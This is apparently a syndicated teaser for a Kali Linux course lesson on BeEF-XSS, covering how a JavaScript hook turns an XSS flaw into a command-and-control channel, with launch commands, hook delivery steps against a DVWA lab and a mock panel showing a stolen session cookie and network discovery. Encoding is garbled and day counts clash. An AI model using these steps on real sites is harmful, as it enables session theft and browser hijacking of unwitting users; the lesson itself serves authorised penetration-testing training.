π° Originally published on SecurityElites β the canonical, fully-updated version of this article.
π‘οΈ KALI LINUX COURSE
FREE
Part of the 120-Day Kali Linux Mastery Course
Day 25 of 180 Β· 13.8% complete
β οΈ Authorised Lab Environments Only. BeEF-XSS sends command modules to hooked browsers. Every exercise in this lab targets your own DVWA instance or browsers you control. Never hook browsers you donβt own. Browser exploitation without authorisation is illegal everywhere.
ZAP found the XSS on Day 24. You confirmed it with alert(1). An alert box fired. Your CVSS score said Medium. Now I want to show you what that Medium actually means when you stop accepting the pop-up and start using the right tool. A pop-up is a proof of concept. BeEF turns the same XSS into a persistent command-and-control channel into the victimβs browser. Same vulnerability. Completely different impact. Thatβs the gap between what scanners report and what pentesters demonstrate β and itβs the gap Day 25 closes.
π― What Youβll Master in Day 25
Launch BeEF-XSS and understand the hooking architecture
Deliver the BeEF hook script via an XSS injection point
Run browser fingerprinting, network discovery, and social engineering modules
Understand the BeEF + Metasploit browser_autopwn chain
Write a professional escalated XSS finding for a pentest report
β±οΈ 45 min read Β· 3 exercises Β· Day 25 of 120 #### β
Before You Start - Day 24: OWASP ZAP β automated scanning found the XSS. Today you take that XSS finding and escalate it from an alert() pop-up to full browser control using BeEF. - DVWA running at http://localhost/dvwa/ with security set to Low. BeEF is pre-installed in Kali β launch with beef-xss. Default credentials: beef/beef. ### π Day 25 β BeEF-XSS Tutorial 1. BeEF Architecture β How the Hook Works 2. Launch BeEF and Deliver the Hook 3. Command Modules β What You Can Do to a Hooked Browser 4. Network Discovery via the Hooked Browser 5. BeEF + Metasploit β Browser Autopwn Chain 6. Reporting Escalated XSS After Day 24βs OWASP ZAP scanning surfaced the XSS findings, Day 25 is where I show you what those findings are really worth. BeEF is the tool that connects ZAPβs XSS alert to an actual browser control channel β and itβs the reason a stored XSS in a site with 10,000 daily users is Critical, not Medium. The full methodology is in the Kali Linux Mastery Course.
BeEF Architecture β How the Hook Works
BeEF (Browser Exploitation Framework) operates through a JavaScript hook β a single script tag that, when executed in a victimβs browser, establishes a persistent connection back to your BeEF server. The victimβs browser becomes a zombie: it polls BeEF every few seconds asking βany commands for me?β You respond through the BeEF web UI by selecting modules to execute.
BEEF ARCHITECTURE β QUICK REFERENCECopy
BeEF hook delivery β the XSS payload
hook.js loads in victim browser β calls home to BeEF C2 on port 3000
Communication flow
Victim browser β GET /hook.js β BeEF server (attacker Kali)
Victim browser β module commands β BeEF web UI (attacker)
Victim browser β module results β BeEF server β attacker sees data
What BeEF runs on
BeEF server: port 3000 β web UI + hook C2 on same port
Web UI: http://127.0.0.1:3000/ui/panel (beef/beef default)
Hook URL: http://KALI_IP:3000/hook.js
securityelites.com
BeEF Web UI β Hooked Browser Control Panel
HOOKED BROWSERS
β 192.168.56.1 (online)
Chrome 121 Β· Windows 10
Hooked: 2m 14s ago
COMMAND MODULES (selected)
β
Browser > Get Cookie β Result: PHPSESSID=abc123; security=low
β
Browser > Fingerprint β Chrome 121 / Win10 / 1920Γ1080
β³ Network > Discovery β Scanning 192.168.56.0/24β¦
β Social Eng > Fake Update β Ready
β Metasploit > Browser Exp β Ready
πΈ BeEF web UI showing a hooked browser. The left panel lists all connected (online) browsers β each one a victim whose browser loaded the hook.js. The right panel shows command module results: Get Cookie has returned the PHPSESSID session token, browser fingerprinting is complete, network discovery is running. From this single XSS injection, I now have the session cookie that grants admin access, the full browser/OS profile for exploit targeting, and a pivot point into the victimβs internal network. This is why stored XSS on an authenticated page is Critical, not Medium.
Launch BeEF and Deliver the Hook
LAUNCHING BEEF AND DELIVERING THE HOOKCopy
Launch BeEF (Kali pre-installed)
sudo beef-xss
Or: sudo /usr/share/beef-xss/beef
Output shows: Web UI at http://127.0.0.1:3000/ui/panel
Hook URL: http://YOUR_KALI_IP:3000/hook.js
Get your Kali IP (use this in the hook payload)
hostname -I | awk β{print $1}β
Hook delivery via stored XSS in DVWA (XSS Stored module)
Navigate to: http://localhost/dvwa/vulnerabilities/xss_s/
Name field: anything
Message field: your hook script
Submit β hook loads when anyone visits the guestbook page
Hook delivery via reflected XSS (URL parameter)
http://localhost/dvwa/vulnerabilities/xss_r/?name=
Verify hook in BeEF UI
Open browser β http://127.0.0.1:3000/ui/panel β beef/beef
Left panel: βHooked Browsersβ should show new entry within 3s
π§ EXERCISE 1 β THINK LIKE A HACKER (15 MIN Β· NO TOOLS)
Design a BeEF Attack Chain β From XSS to Maximum Impact
β±οΈ 15 minutes Β· No tools required
π Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites β
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)